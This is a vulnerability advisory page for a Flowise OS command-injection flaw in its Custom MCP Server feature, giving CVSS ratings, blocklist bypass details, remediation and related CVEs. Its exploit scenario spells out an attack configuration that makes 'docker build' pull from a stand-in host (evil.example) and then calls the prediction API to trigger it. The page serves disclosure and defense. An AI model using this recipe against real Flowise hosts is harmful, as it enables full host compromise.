Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Network-reachable Flowise UI/API, low complexity, requires any-role account or chatflow-permissioned API key (PR:L), no user interaction, full host RCE gives C/I/A:H.
Primary rating from Vendor (VulnCheck).
CVSS VectorVendor: VulnCheck
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
4DescriptionCVE.org
Flowise before 3.1.2 contains multiple OS command injection vulnerabilities in the Custom MCP Server feature due to incomplete command-flag validation and a regex bypass in local file access restrictions. An attacker with a Flowise account of any role, or API access with view/update permissions for chatflows, can configure a malicious MCP server to bypass the validateCommandFlags blocklist (for example, 'docker build' is not blocked, and 'npx --yes' is not blocked while only '-y' is) and the validateArgsForLocalFileAccess checks, resulting in execution of arbitrary commands on the Flowise host.
AnalysisAI
Remote code execution in Flowise before 3.1.2 allows any authenticated user (or API caller with chatflow view/update permissions) to abuse the Custom MCP Server feature and run arbitrary OS commands on the host. The validateCommandFlags blocklist and validateArgsForLocalFileAccess regex are incomplete - for example 'docker build' is permitted and 'npx --yes' is permitted while only '-y' is blocked - letting attackers point Flowise at a hostile Dockerfile or local script to achieve full host compromise. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | The target must be Flowise <= 3.1.1 with the Custom MCP Server feature reachable to the attacker, and the attacker must hold either a Flowise account of any role or an API key with view and update permissions on chatflows - fully unauthenticated exploitation is not possible. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 4.0 vector AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H (8.7 High) is consistent with the description: exploitation is network-reachable, low-complexity, requires some privilege (an account of any role, or an API key with chatflow view/update), needs no user interaction, and yields full confidentiality/integrity/availability impact on the host. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker who has signed up for (or been given) a low-privilege Flowise account, or who has obtained an API key with view/update on chatflows, creates a chatflow containing a Custom MCP Server node configured with command 'docker' and args ['build','https://evil.example/']; the validateCommandFlags check passes because 'build' is not in the docker blocklist. The attacker then issues POST /api/v1/prediction/{chatflows_id} which causes Flowise to invoke 'docker build' against the remote URL, pulling and executing a hostile Dockerfile whose RUN instructions and volume-mount tricks break out to the Flowise host. … |
| Remediation | Vendor-released patch: upgrade flowise and flowise-components to 3.1.2 or later, which extends the validateCommandFlags blocklist and tightens the validateArgsForLocalFileAccess regex (see the GHSA-m99r-2hxc-cp3q advisory). … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Identify all Flowise deployments and determine current versions; review recent authentication logs and API access for signs of exploitation; isolate any instances exposed to untrusted networks. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl
runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l
Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2
Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve
cpp-httplib is a C++11 single-file header-only cross platform HTTP/HTTPS library. Prior to 0.27.0, a vulnerability allow
Unauthenticated remote code execution in DbGate (npm package dbgate-serve, versions <= 7.1.8) lets remote attackers exec
Hard-coded default PostgreSQL credentials shipped in the docker-compose.yaml of langgenius Dify through version 1.5.1 al
Dokploy self-hosted PaaS prior to 0.26.6 has a critical command injection vulnerability (CVSS 9.9) allowing authenticate
An authenticated path traversal vulnerability in Langflow's file upload functionality allows attackers to write arbitrar
Critical access control flaw in Dozzle Docker log viewer allows users restricted by label filters to escape their scope
Same weakness CWE-78 – OS Command Injection
View allSame technique Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-38434
GHSA-8rhx-2hcv-q49g